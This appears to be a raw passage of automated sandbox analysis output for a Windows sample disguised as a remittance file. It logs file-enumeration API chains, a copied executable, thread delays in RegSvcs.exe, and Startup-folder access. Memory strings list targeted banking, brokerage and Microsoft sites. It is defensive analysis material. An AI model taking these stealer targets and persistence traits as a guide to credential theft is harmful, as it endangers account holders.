                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00452492
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00442886
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_004788BD
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,6_2_004339B6
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,6_2_0045CAFA
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00431A86
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,6_2_0044BD27
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045DE8F FindFirstFileW,FindClose,6_2_0045DE8F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0044BF8B
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599217Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597352Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594700Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595406Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595187Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegSvcs.exe, 00000003.00000002.4561527420.00000000008F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: name.exe, 00000006.00000002.2355877135.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: name.exe, 00000006.00000002.2355877135.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegSvcs.exe, 00000007.00000002.4560615551.0000000000DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeAPI call chain: ExitProcess graph end nodegraph_0-86668
